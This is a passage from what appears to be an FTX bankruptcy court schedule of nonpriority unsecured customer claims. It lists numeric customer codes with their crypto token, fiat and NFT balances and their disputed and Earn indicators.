| 07392583 | | BAT[140.19709417], BCH[.06429177], BRZ[27.29226896], BTC[.00105126], CAD[6.26], CUSDT[496.89183978], DOGE[4108.11322041], ETH[.09729314], ETHW[.09729314], GRT[72.54744036], LINK[3.44890849], LTC[.54964521], MATIC[6.86481641], SOL[4.69168184], TRX[157.12715119], UNI[2.9198438], USD[0.00], USDT[5.9730307] | | |
| 07392584 | | BTC[0], ETH[0], UNI[0], USD[0.00] | | |
| 07392585 | | BAT[1.01045606], BRZ[2], CUSDT[11], SOL[.00001519], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07392587 | | BTC[.000185], USD[0.00] | | |
| 07392590 | | USD[10.00] | | |
| 07392593 | | BRZ[1], NFT (3674168414586484446/FTX - Off The Grid Miami #1970)[1], USD[0.00] | Yes | |
| 07392594 | | USD[0.26], USDT[0] | | |
| 07392599 | | BTC[0] | | |
| 07392607 | | CUSDT[17], DOGE[3], TRX[2], USD[0.01] | | |
| 07392608 | | BRZ[1], USD[1.00], USDT[1] | | |
| 07392610 | | CUSDT[2], USD[0.01] | | |
| 07392612 | | BAT[1.01398805], CUSDT[5032.0264372], DOGE[15201.56029566], ETH[2.43908503], ETHW[2.43806061], GRT[3.16597422], LTC[30.39802119], TRX[871.48538945], USD[0.00], USDT[1.10078367] | Yes | |
| 07392615 | | NFT (534675160098523273/Coachella x FTX Weekend 2 #708)[1], USD[0.10] | Yes | |
| 07392618 | | CUSDT[4], DOGE[4568.13038457], GRT[1], TRX[1], USD[4.00] | | |
| 07392619 | | CUSDT[4], USD[0.00] | | |
| 07392625 | | BAT[295.2264612], BTC[0.01310857], SOL[64.81445301], USD[479.66] | Yes | |
| 07392628 | | CUSDT[2], DOGE[1599.2891891], KSHIB[2522.98438777], NFT (509083659310913536/Baby Saint Michael)[1], TRX[2647.16685958], USD[0.05] | Yes | |
| 07392633 | | CUSDT[2], DOGE[142.47517911], ETH[.01520239], ETHW[.01520239], USD[100.00] | | |
| 07392634 | | DOGE[0] | | |
| 07392637 | | BTC[0] | | |
| 07392642 | | BTC[.0013693], CUSDT[4], DOGE[92.02538594], ETH[.03512616], ETHW[.0346884], SOL[.38104805], TRX[130.63731623], USD[0.04] | Yes | |
| 07392643 | | USD[10.00] | | |
| 07392645 | | BRZ[2], CUSDT[3], DOGE[1141.20341651], GRT[1.00367791], SHIB[41456072.72742743], SUSHI[1.09670475], TRX[4], USD[0.00], USDT[1.09710555] | Yes | |
| 07392646 | | USD[0.00] | | |
| 07392647 | | SOL[1.11815708], USD[0.00] | | |
| 07392649 | | USD[10.00] | | |
| 07392655 | | AAVE[.0089606], BTC[0.00011569], ETH[.000377], ETHW[.000377], SOL[.0182122], USD[157.20] | | |
| 07392656 | | DOGE[1.00002193], USD[0.00] | | |
| 07392661 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07392662 | | BTC[.00000001], LINK[.00020403], NEAR[.00008689], USD[0.01] | Yes | |
| 07392663 | | USD[0.00] | | |
| 07392667 | | BTC[.00565647], CUSDT[1], DOGE[806.45520478], LINK[.0009577], TRX[1815.69726947], USD[4.79] | | |
| 07392668 | | AUD[0.00], BRZ[3], BTC[0], CUSDT[14], DOGE[1], TRX[219.93452306], USD[107.79], USDT[1] | | |
| 07392674 | | BCH[.15933695], BRZ[5.07952967], BTC[0.02216492], CUSDT[66.34524839], DOGE[168.68070023], ETH[.01541406], ETHW[.01522254], LTC[1.14419969], MATIC[5.01679677], SHIB[634762.91718413], SOL[.13729219], SUSHI[0.27728414], TRX[6], USD[10.20], YFI[0.00012504] | Yes | |
| 07392677 | | BCH[.01308849], CUSDT[6], DOGE[291.21751867], ETH[.0063611], ETHW[.0063611], LTC[.04946712], TRX[183.4727558], USD[0.00] | | |
| 07392678 | | BAT[1.0165555], BRZ[4], CUSDT[24], DOGE[9.62097591], USD[0.68] | Yes | |
| 07392679 | | USD[0.00] | | |
| 07392680 | | TRX[1], USD[0.00] | | |
| 07392681 | | BRZ[1], CUSDT[9], DOGE[1], ETH[0], ETHW[0], GRT[2.03682798], USD[0.00], USDT[2.17016502] | Yes | |
| 07392684 | | LINK[.07], USD[10.61] | | |
| 07392687 | | BAT[17.25230552], CUSDT[8], DOGE[2], GRT[8.9145509], SUSHI[1.00729819], TRX[2624.93708172], USD[4.70] | | |
| 07392688 | | CUSDT[472.78056893], DOGE[1624.90377985], TRX[1], USD[0.02] | | |
| 07392691 | Contingent, Disputed | USD[0.00] | Yes | |
| 07392693 | | USD[0.00] | | |
| 07392696 | | CUSDT[1], DOGE[561.90727803], USD[0.00] | Yes | |
| 07392697 | | SOL[.0052197], USD[0.00], USDT[0] | | |
| 07392700 | | BTC[0], DOGE[0], LTC[0.02203791], SOL[0.33498046], SUSHI[0.22164553], TRX[300], UNI[.39848], USD[0.00] | | |
| 07392704 | | BTC[.00792547], USD[3.28] | | |
| 07392705 | | SUSHI[.62888918], USD[0.00] | | |
| 07392706 | | NFT (341627896567247515/Entrance Voucher #4255)[1] | | |
| 07392707 | | BRZ[1], DOGE[1316.7469913], USD[0.00] | | |
| 07392708 | | MATIC[4196.34627446], USD[11.03] | Yes | |
| 07392710 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07392716 | | USD[29.43] | | |
| 07392717 | | DOGE[1], GRT[362.58019258], USD[0.00] | | |
| 07392718 | | USD[10.00] | | |
| 07392720 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07392723 | | BTC[0], ETH[0], USD[5384.97] | | |
| 07392724 | | BAT[1.0165555], CUSDT[1], DOGE[16418.14765078], GRT[1.00367791], USD[0.01], USDT[1.08980588] | Yes | |
| 07392731 | | USD[10.00] | | |
| 07392736 | | TRX[1], USD[0.00] | | |
| 07392738 | | BTC[0], CUSDT[0], DOGE[0], LINK[0], TRX[0], USD[0.00] | | |
| 07392742 | | DOGE[1], USD[0.01] | | |
| 07392744 | | BAT[1], BRZ[5.01550338], CUSDT[7], DOGE[7.00057537], NFT (551966240845712728/Romeo #612)[1], SHIB[7], TRX[2], USD[0.00] | Yes | |
| 07392746 | | SOL[0], USD[1.67] | | |
| 07392748 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07392750 | | CUSDT[5], DOGE[1], USD[8.28] | Yes | |
| 07392751 | | BRZ[2], CUSDT[123.07322849], LTC[0], TRX[3], USD[0.00] | Yes | |
| 07392753 | | DOGE[3], GRT[34.66049231], USD[0.00] | | |
| 07392755 | | BTC[.03573647], CUSDT[1], ETH[.15789183], ETHW[.15789183], TRX[1], USD[0.00] | | |
| 07392757 | | DOGE[3], USD[0.00] | | |
| 07392758 | | USD[10.00] | | |
| 07392765 | | BRZ[5], CUSDT[13], GRT[1], SUSHI[0], TRX[1], USD[0.00], USDT[2] | | |
| 07392768 | | BAT[1], CUSDT[6], DOGE[6], GRT[.43888601], SOL[.00918409], USD[0.01] | | |
| 07392769 | | BAT[0], BTC[0], DOGE[7], TRX[1], USD[0.00] | | |
| 07392776 | | BCH[0], BTC[0.00007970], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07392780 | | BAT[77.44128802], BRZ[28.1081562], BTC[0.00073122], CUSDT[3], DAI[0], DOGE[97.52511648], ETH[.01111824], ETHW[.01098144], GRT[4.84455055], LINK[.00639], LTC[.34103017], MATIC[11.32131801], NFT (522359151210530694/Space Bums #9762)[1], SHIB[1279548.69199523], SOL[0.44064141], SUSHI[.65775262], TRX[826.20495467], UNI[.06371009], USD[0.00] | Yes | |
| 07392782 | | BTC[.00018844], CUSDT[3], SOL[.51696895], USD[0.00], USDT[0.00000217] | Yes | |
| 07392785 | | USD[10.00] | | |
| 07392788 | | AAVE[0], AVAX[0], BAT[0], BCH[0], BRZ[3], BTC[0], CUSDT[0], DAI[0], DOGE[1], ETH[0.01229524], ETHW[0.01214476], GRT[0], LINK[0], LTC[0], MATIC[0], NEAR[0], NFT (331335097892032269/Barcelona Ticket Stub #1294)[1], PAXG[0], SHIB[6], SOL[0], SUSHI[0], TRX[8], UNI[0], USD[0.00], USDT[2.11244807], YFI[0] | Yes | |
| 07392790 | | GRT[1], USD[0.00], USDT[119.37660343] | | |
| 07392791 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07392795 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0.00011873], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07392798 | | DOGE[151.54569026], USD[0.00] | | |
| 07392805 | | USD[0.64] | | |
| 07392809 | | SHIB[3], USD[0.00] | Yes | |
| 07392815 | | USD[0.01], USDT[0] | | |
| 07392819 | | BRZ[1], CUSDT[3], GRT[2], USD[0.32] | | |
| 07392822 | | BCH[.00497237], BTC[.00003265], ETH[.0010393], ETHW[.0010393], LINK[.1002121], LTC[.00881254], USD[0.00] | | |
| 07392827 | | TRX[54.1873843], USD[0.00] | | |
| 07392828 | | USD[0.00] | | |
| 07392832 | | USD[10.00] | | |
| 07392835 | | BAT[1.0165555], BRZ[2], BTC[0], CUSDT[9], DAI[0], DOGE[4.03209138], ETH[0], LINK[0], TRX[2], USD[0.00] | Yes | |
| 07392836 | | CUSDT[2], DOGE[86.09652525], MATIC[24.60156534], TRX[1], USD[60.62] | | |
| 07392843 | | DOGE[.37144538], USD[0.00] | | |
| 07392845 | | BAT[1.01373004], BRZ[5.07952967], CUSDT[9], DOGE[25.37808291], ETH[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07392846 | | DOGE[148.41533973], USD[0.00] | | |
| 07392848 | | CUSDT[2], USD[0.22] | | |
| 07392849 | | BTC[0.01959915], ETH[0.16028738], ETHW[0.15976616], SHIB[1], USD[0.00] | Yes | |
| 07392856 | | BRZ[3], CUSDT[9], DOGE[9277.63056527], GRT[1.00367791], TRX[5], USD[0.00], USDT[1.09875986] | Yes | |
| 07392863 | | USD[2.58] | | |
| 07392869 | | USD[0.00] | | |
| 07392878 | | BTC[0], USD[0.00] | | |
| 07392890 | | USD[10.00] | | |
| 07392891 | | USD[97.66] | | |
| 07392900 | | ALGO[0], AVAX[0.00000001], BTC[0], ETH[0], SOL[0], TRX[.000119], USD[0.00], USDT[0.00021138] | | |
| 07392906 | | USD[10.00] | | |
| 07392928 | | DOGE[0], TRX[0], USD[0.14], USDT[0] | | |
| 07392930 | | BCH[.00429396], BRZ[2.34626536], CUSDT[11], DOGE[1.88605927], GRT[3], LINK[.00826611], TRX[376.6182831], USD[0.63] | | |
| 07392931 | | SHIB[2700000], SOL[294.9985], USD[10.53] | | |
| 07392932 | | USD[0.00] | | |
| 07392934 | | DOGE[1], TRX[1085.62427551], USD[0.00] | | |
| 07392935 | | BAT[669.65680826], BRZ[3], CUSDT[40165.23409581], DOGE[23592.67882922], LINK[124.43481512], TRX[56982.12343988], USD[31.72], USDT[1.10431494] | Yes | |
| 07392936 | | BRZ[2], BTC[0], CUSDT[1], DOGE[18856.39127520], TRX[2], USD[0.00], USDT[1] | | |
| 07392939 | | LTC[0], SUSHI[0], TRX[1.07896103], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07392944 | | BRZ[1], BTC[0.00714324], CUSDT[2], ETH[.02783551], ETHW[.02783551], TRX[2], USD[0.00] | | |
| 07392947 | | BTC[0], CUSDT[3], TRX[1], USD[0.01] | | |
| 07392950 | | CUSDT[5], USD[0.00] | | |
| 07392951 | | BCH[.864135], USD[0.39], USDT[0] | | |
| 07392952 | | CUSDT[3], DOGE[0], USD[0.09] | | |
| 07392960 | | BAT[1], BRZ[4], CUSDT[4], DOGE[14041.66705144], TRX[2], USD[0.00], USDT[3] | | |
| 07392961 | | BTC[0], USD[17.90], USDT[0] | | |
| 07392962 | | BTC[.0000772], DOGE[20004.66], ETH[.000316], ETHW[.000316], USD[0.64] | | |
| 07392968 | | BTC[.00016284], USD[0.00] | | |
| 07392970 | | USD[0.00] | | |
| 07392976 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07392977 | | USD[2.40] | | |
| 07392978 | | BTC[0], USDT[0.00000006] | | |
| 07392982 | | BAT[1], DOGE[3416.88796705], SOL[4.49167157], TRX[211.98379376], USD[91.21] | | |
| 07392984 | | BTC[.00208278], DOGE[2], USD[0.00], USDT[0] | | |
| 07392987 | | USD[10.00] | | |
| 07392993 | | BTC[0], DOGE[0], ETH[0], ETHW[0.00013179], LINK[0], LTC[0], SOL[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07392994 | | AVAX[0], BTC[0], SOL[0], USD[0.64] | | |
| 07392997 | | BTC[.00085008], DOGE[1], USD[0.01] | | |
| 07392999 | | DOGE[2302.22595522], TRX[1], USD[0.00] | | |
| 07393001 | | DOGE[145.31016527], USD[0.00] | | |
| 07393004 | | ALGO[79.858195], BRZ[2], BTC[.00079982], CUSDT[4], DOGE[3], ETH[.00057734], SHIB[44445], TRX[2], UNI[1.35564858], USD[33.35] | | |
| 07393016 | | CUSDT[2], ETH[0], SHIB[2], USD[0.00] | Yes | |
| 07393017 | | USD[0.00] | | |
| 07393020 | | BTC[.00000052], CUSDT[2], DOGE[297.79905087], TRX[1], USD[0.24] | Yes | |
| 07393021 | | DAI[10.91448349], DOGE[4], GRT[10.01413864], SOL[3.5768895], TRX[115.33644024], USD[1.00] | | |
| 07393027 | | DOGE[946.36988325], LINK[5.01615872], USD[0.00] | | |
| 07393028 | | USD[11.07] | Yes | |
| 07393031 | | CUSDT[1], DOGE[98.63356087], USD[0.00] | Yes | |
| 07393033 | | CUSDT[3], DOGE[.00003888], USD[0.00] | | |
| 07393037 | | DOGE[1], ETH[.11038776], ETHW[.11038776], USD[0.00] | | |
| 07393041 | | BTC[0], DAI[.02067771], DOGE[4], ETH[.00000001], SHIB[686.97788778], USD[0.00] | Yes | |
| 07393042 | | SOL[.00178012], USD[0.00], USDT[0] | Yes | |
| 07393047 | | BRZ[2], BTC[.03911291], DOGE[2], ETH[1.06663807], ETHW[1.06663807], USD[10.00] | | |
| 07393049 | Contingent, Disputed | USD[0.00] | | |
| 07393050 | | USD[3.30] | | |
| 07393051 | | DOGE[.012], LTC[.5478], USD[0.00], USDT[1.15322418] | | |
| 07393053 | | BTC[0], ETH[.004295], ETHW[.004295], TRX[5880.114006], UNI[.0707], USD[0.00], USDT[.003281] | | |
| 07393061 | | DOGE[0], SHIB[1], TRX[2], UNI[0], USD[87.66] | Yes | |
| 07393067 | | SHIB[4349302.25501113], TRX[4], USD[0.00] | | |
| 07393068 | | CUSDT[1], DOGE[.43940168], TRX[1], USD[0.56] | | |
| 07393069 | | CUSDT[2], DOGE[5.09011717], USD[0.00] | | |
| 07393073 | | BAT[16.08094399], CUSDT[2], DOGE[4.02771187], GRT[58.17814079], SOL[1.35316677], TRX[.00001803], USD[0.01] | Yes | |
| 07393074 | | DOGE[.49069929], USD[0.01] | Yes | |
| 07393076 | | DOGE[144.3621718], ETH[.00424547], ETHW[.00419075], PAXG[.00247332], USD[0.00] | Yes | |
| 07393078 | | SUSHI[.199] | | |
| 07393079 | | USD[10.00] | | |
| 07393082 | | USD[10.00] | | |
| 07393084 | | BTC[0], DAI[.00000001], USD[20.67], USDT[0.00000001] | | |
| 07393085 | | BTC[0], SHIB[93430938.1622038], USD[1.08] | | |
| 07393086 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07393093 | | CUSDT[3], DOGE[2510.98743965], USD[0.00] | Yes | |
| 07393095 | | BCH[0], BRZ[8.42053525], CUSDT[.29228143], DOGE[7129.96795052], ETH[.19906049], ETHW[0.17814958], LINK[2.18330995], MATIC[38.83796207], NFT [311455565033451463/Microphone #157][1], NFT (342495661181106107/Fancy Frenchies #4174)[1], NFT [495922510823259437/First 50 #19][1], NFT (541187645988054063/Microphone #237)[1], SHIB[2706030.67363947], SOL[2.47659624], TRX[3544.84104426], USD[-130.00], USDT[0] | Yes | |
| 07393096 | | USD[0.00] | | |
| 07393099 | | USD[2000.00] | | |
| 07393101 | | BRZ[1], CUSDT[605.51466317], DOGE[1], SHIB[2], TRX[2], USD[113.27] | Yes | |
| 07393104 | | BRZ[1], CUSDT[1], DOGE[1], GRT[0.00522198], TRX[1], USD[0.00], USDT[1.10344585] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393105 | | BAT[1], BRZ[2], CUSDT[6], DOGE[3], ETH[0], GRT[2], TRX[5], USD[0.00], USDT[1] | | |
| 07393109 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07393119 | | CUSDT[9], DOGE[4.05213569], SHIB[4], TRX[0], USD[0.00] | Yes | |
| 07393121 | | SOL[.78210025], USD[0.35], USDT[0.00000028] | | |
| 07393125 | | BRZ[5], CUSDT[7], USD[0.00] | | |
| 07393126 | | DOGE[2], USD[0.00] | Yes | |
| 07393127 | | CUSDT[4], DOGE[1], TRX[703.91272449], USD[0.00] | | |
| 07393130 | | DAI[.05], USD[0.01] | | |
| 07393131 | | DOGE[3696.10903649], TRX[2067.7224906], USD[0.00] | Yes | |
| 07393133 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[2], DOGE[22.60119511], USD[0.00] | | |
| 07393135 | | USD[0.01] | | |
| 07393137 | | BRZ[5.07952967], CUSDT[7], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07393142 | | BTC[.00010509] | | |
| 07393145 | | USD[100.00] | | |
| 07393148 | | USD[10.00] | | |
| 07393149 | | CUSDT[1], TRX[457.41283834], USD[0.00] | | |
| 07393150 | | USD[0.00] | | |
| 07393153 | | BRZ[2], CUSDT[1], GRT[1.00404471], SOL[.00001703], TRX[1], USD[0.00] | Yes | |
| 07393154 | | DOGE[2], USD[0.00] | Yes | |
| 07393155 | | BAT[2.08677928], BRZ[1], CUSDT[8], DOGE[26044.8001353], SHIB[4], TRX[2759.09125886], USD[0.00], USDT[1.08108275] | Yes | |
| 07393157 | | BTC[.10397745], GRT[1], USD[0.00] | | |
| 07393160 | | CUSDT[1], DOGE[251.26209522], ETH[0], TRX[1], USD[0.00] | | |
| 07393162 | | GRT[36.96485], USD[2.03] | | |
| 07393164 | | CUSDT[1], TRX[174.65961461], USD[0.00] | | |
| 07393167 | | CUSDT[3], DOGE[27.03947607], TRX[2], USD[0.68] | | |
| 07393168 | | USD[10.00] | | |
| 07393171 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07393172 | | TRX[134.10304907], USD[0.00] | | |
| 07393174 | | DAI[887.85772025], DOGE[1619.9966858], GRT[273.55111390], LINK[8.86995707], MATIC[225.5068997], TRX[1890.83418142], UNI[5.89186592], USD[0.00] | Yes | |
| 07393177 | | CUSDT[1], USD[0.00] | | |
| 07393179 | | BRZ[1], CUSDT[2], TRX[5], USD[0.01] | Yes | |
| 07393180 | | USD[0.01] | | |
| 07393184 | | ETH[0], USD[0.01] | Yes | |
| 07393186 | Contingent, Disputed | USD[0.67] | | |
| 07393189 | | USD[0.00], USDT[0] | | |
| 07393192 | | BAT[2.09732544], BRZ[2], SOL[3.21537444], USD[0.00], USDT[1.09217709] | Yes | |
| 07393195 | | USD[10.00] | | |
| 07393196 | | BAT[3.01664184], BTC[.00000706], CUSDT[3], ETH[.00006326], GRT[1], SHIB[5], USD[18354.26], USDT[0] | Yes | |
| 07393197 | | NFT (330264736568618447/Saudi Arabia Ticket Stub #1543)[1], NFT (368780044567749471/FTX - Off The Grid Miami #3879)[1] | | |
| 07393198 | | BTC[.00332722], DOGE[383.0260541], ETH[0.03225548], ETHW[0.03185876], GRT[45.34250763], LINK[2.043855], LTC[.20714757], MATIC[10.49332453], SHIB[4], SOL[1.30096098], SUSHI[1.17686811], TRX[2], UNI[1.71290622], USD[0.00], YFI[0.00201145] | Yes | |
| 07393200 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07393202 | | USD[0.00], USDT[0.00001082] | | |
| 07393205 | | BTC[0], TRX[440], USD[0.00] | | |
| 07393208 | | CUSDT[10], LTC[.019448], TRX[63.45047984], USD[192.87], YFI[0] | | |
| 07393209 | | BRZ[1], LTC[.00001481], USD[0.00] | | |
| 07393211 | | USD[10.00] | | |
| 07393218 | | BRZ[1], CUSDT[1], SOL[.25021581], TRX[1], USD[0.00] | | |
| 07393220 | | DOGE[0], LTC[0], USD[0.00] | | |
| 07393224 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07393228 | | BTC[.00006108], USD[0.00] | | |
| 07393229 | | USD[0.00], USDT[0] | | |
| 07393230 | | ETH[0], TRX[1], USD[0.00], YFI[0] | Yes | |
| 07393232 | | TRX[.88883] | | |
| 07393234 | | USD[0.00] | Yes | |
| 07393242 | | USD[10.00] | | |
| 07393244 | | AVAX[.0062], BTC[.00090178], ETH[.009028], ETHW[.009028], USD[1.09] | | |
| 07393247 | | ETH[1.51156265], ETHW[1.51156265], USD[2.56] | | |
| 07393249 | | DOGE[3], NFT (401746539148509248/FTX - Off The Grid Miami #386)[1], NFT (411590153037656383/Imola Ticket Stub #1653)[1], NFT (478250558229840122/Romeo #360)[1], SHIB[1], SOL[0], TRX[2], USD[0.00] | Yes | |

Amended Schedule F-52 Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393251 | | BRZ[1], BTC[.00001023], DOGE[0], TRX[3] | | |
| 07393254 | | USD[10.00] | | |
| 07393257 | | CUSDT[10], TRX[3], USD[0.00] | | |
| 07393258 | | DOGE[1], GRT[6.39724490], LTC[.07474619] | | |
| 07393260 | | BTC[.000014], ETH[2], ETHW[2], USD[4038.76] | | |
| 07393261 | | USD[0.05] | | |
| 07393264 | | CUSDT[1], DOGE[1], USD[21.26] | | |
| 07393265 | | CUSDT[1], DOGE[3521.0849441], TRX[1], USD[0.00] | | |
| 07393266 | | BTC[0], SOL[0], TRX[0.31689370], USD[3.84] | | |
| 07393269 | | TRX[4.49151176], USD[0.00] | | |
| 07393271 | | SOL[10.77209592], USD[0.00] | | |
| 07393274 | | CUSDT[1], MATIC[192.72415438], TRX[1], USD[88.00] | | |
| 07393275 | | DOGE[0], MATIC[0], NFT (305301607857376987/Tooner #47)[1], NFT (309143316499014097/StarAtlas Anniversary)[1], NFT (309200944897419948/Tooner #22)[1], NFT (342769962934867564/Tooner #25)[1], NFT (343988836486454764/StarAtlas Anniversary)[1], NFT (344311001514417330/StarAtlas Anniversary)[1], NFT (350389604712680814/Tooner #42)[1], NFT (354005148528288061/Tooner #29)[1], NFT (355178326939955343/StarAtlas Anniversary)[1], NFT (356770862242886757/Tooner #50)[1], NFT (357855481995643249/Pot #13)[1], NFT (365903701441559394/Tooner #44)[1], NFT (367230070291657463/Dooger #4)[1], NFT (367558365057141049/Tooner #39)[1], NFT (374371153089538751/StarAtlas Anniversary)[1], NFT (394537356688449784/Tooner #32)[1], NFT (399043002708249903/Trip #7)[1], NFT (399449005881116462/1Tooner #38)[1], NFT (403063481997589241/Tooner #37)[1], NFT (409580993928333644/Dooger #9)[1], NFT (415767030565706550/Tooner #35)[1], NFT (418842317500590130/Rose #0041)[1], NFT (429136733353143475/Tooner #40)[1], NFT (435836948981237068/Rose #0021)[1], NFT (436561976324088785/Tooner #28)[1], NFT (437876137500485250/Dooger #5 #2)[1], NFT (451255840478046330/StarAtlas Anniversary)[1], NFT (452704585254021698/Dooger #3)[1], NFT (458405636262700831/Dooger #7)[1], NFT (467830547852749066/Dooger #8)[1], NFT (468322317406862824/Dooger #10)[1], NFT (469055581230084546/Tooner #36)[1], NFT (471181676022740893/Pot #142)[1], NFT (471528244636107232/Pot #77)[1], NFT (473420904854395177/SubzZz Crypto Art)[1], NFT (479150818526699072/Tooner #30)[1], NFT (485257125549478874/Dooger #5)[1], NFT (487124542026923049/Tooner #48)[1], NFT (488763938172203736/Tooner #33)[1], NFT (496277825556590311/Tooner #18)[1], NFT (498220628749439099/Tooner #45)[1], NFT (498989369689840649/Tooner #46)[1], NFT (511534413749258075/StarAtlas Anniversary)[1], NFT (515837845925491849/Dooger #1)[1], NFT (517943171795099099/Tooner #20)[1], NFT (519252186514960455/Tooner #23)[1], NFT (524619525062948437/Dooger #2)[1], NFT (532640451977231938/Tooner #34)[1], NFT (534062480130881400/Tooner #26)[1], NFT (535229952452684016/Tooner #27)[1], NFT (536188345256269076/Tooner #41)[1], NFT (537776862879653871/Pot #5)[1], NFT (545056300781979846/Dooger #6)[1], NFT (561812124567917232/Tooner #49)[1], NFT (566723758798616566/Pot #31)[1], NFT (573829188124129063/StarAtlas Anniversary)[1], NFT (574528371644675810/Tooner #43)[1], SHIB[0], SOL[0], TRX[0], USD[0.00] | | |
| 07393276 | | DOGE[1780.31788269], USD[0.00] | | |
| 07393277 | | CUSDT[2], DOGE[1], LINK[1.0178816], LTC[.12395109], SHIB[89621.79602079], TRX[1], USD[79.59] | | |
| 07393278 | | CUSDT[1], ETH[0.00000092], ETHW[0], LINK[1.12527475], MATIC[75.12506842], NFT (321504746825963666/Barcelona Ticket Stub #1645)[1], NFT (458778673580617226/Saudi Arabia Ticket Stub #864)[1], NFT (534045926764467672/Geovald #72)[1], SHIB[1422168.00551898], SOL[.00031984], USD[44.00] | Yes | |
| 07393281 | | BAT[2], CUSDT[1], DOGE[.00003779], GRT[0.00049960], TRX[2], USD[0.00] | | |
| 07393285 | | DOGE[145.20987473], USD[0.00] | | |
| 07393291 | | SOL[0], USD[0.00] | | |
| 07393293 | | BTC[.00242812], CUSDT[4], DOGE[1], ETH[0.00000026], ETHW[0.00000026], TRX[1], USD[0.00] | Yes | |
| 07393294 | | USD[0.00] | | |
| 07393296 | | BAT[4503.13210508], BRZ[9.1504431], BTC[.22720031], CUSDT[5], ETH[1.29356198], ETHW[1.29303576], GRT[4.13107559], LINK[18.68757388], LTC[4.50531729], SHIB[16695517.34832464], TRX[40451.75144588], USD[5460.67], USDT[1.05058165] | Yes | |
| 07393305 | | BRZ[1], CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07393306 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07393308 | | CUSDT[1], GRT[1], SHIB[1], TRX[2], USD[0.00] | | |
| 07393313 | Contingent, Disputed | BTC[0], CUSDT[9], DOGE[1], ETH[0], ETHW[0], LTC[0], MATIC[0], SHIB[15], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07393317 | | USD[10.00] | | |
| 07393319 | | BTC[0], CUSDT[1], TRX[1], USD[0.00] | | |
| 07393323 | | BTC[0], DOGE[313.37648194], SOL[6.66154964], SUSHI[11.33586173], TRX[1], USD[0.00] | Yes | |
| 07393324 | | CUSDT[1], USD[0.00] | | |
| 07393325 | | BRZ[1], CUSDT[2], TRX[1.00004447], USD[0.01] | | |
| 07393327 | | BRZ[3], BTC[.12230658], CUSDT[31], DOGE[823.64848112], ETH[.22772828], ETHW[.22772828], SHIB[4], TRX[286.88868267], USD[0.36] | | |
| 07393328 | | CUSDT[1], DOGE[172.48409226], ETH[.01091041], ETHW[.01091041], TRX[1], USD[0.00] | | |
| 07393329 | | BRZ[1], DOGE[2198.80441733], SHIB[20955903.60213765], TRX[1], USD[1.51] | Yes | |
| 07393330 | | AAVE[.71970746], BRZ[1], BTC[.0079172], CUSDT[10], DOGE[3], ETH[.19738697], ETHW[.19738697], MATIC[156.68285277], SHIB[461893.76443418], SOL[.67254758], SUSHI[19.38118986], TRX[2], USD[0.00] | | |
| 07393331 | | DOGE[11], USD[0.01] | | |
| 07393332 | | TRX[1], USD[0.00] | | |
| 07393336 | | BAT[0], BRZ[0], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[0], SOL[1.30762561], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07393337 | | DOGE[1335.09835509], TRX[1], USD[0.00], USDT[1] | | |
| 07393339 | | BAT[2.13037399], BRZ[2], CUSDT[3], DOGE[0], ETH[0], ETHW[0.54334812], SOL[0], TRX[6], USD[454.38], USDT[0] | Yes | |
| 07393342 | | DOGE[1], LINK[1.58599385], USD[10.00] | | |
| 07393346 | | DOGE[2], ETHW[.16052237], MATIC[.00058753], SHIB[6], TRX[1], USD[0.00] | Yes | |
| 07393347 | | TRX[188.35594829], USD[0.00] | | |
| 07393353 | | MATIC[0], USD[0.00] | Yes | |
| 07393363 | | CUSDT[4], DOGE[1], USD[0.00] | | |
| 07393365 | | USD[10.00] | | |
| 07393366 | | CUSDT[1], USD[0.00] | Yes | |
| 07393368 | | CUSDT[258.35686558], USD[0.00] | Yes | |
| 07393375 | | CUSDT[1], DOGE[775.15876005], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07393376 | | USD[10.00] | | |
| 07393384 | | BAT[14.01362584], USD[0.00] | | |
| 07393385 | | TRX[1], USD[0.00] | | |
| 07393393 | | NFT (402916563814953569/FTX - Off The Grid Miami #246)[1] | | |
| 07393394 | | DOGE[1], SUSHI[2.90064555], USD[0.00] | | |
| 07393402 | | NFT (294949727686915983/FTX - Off The Grid Miami #6890)[1] | | |
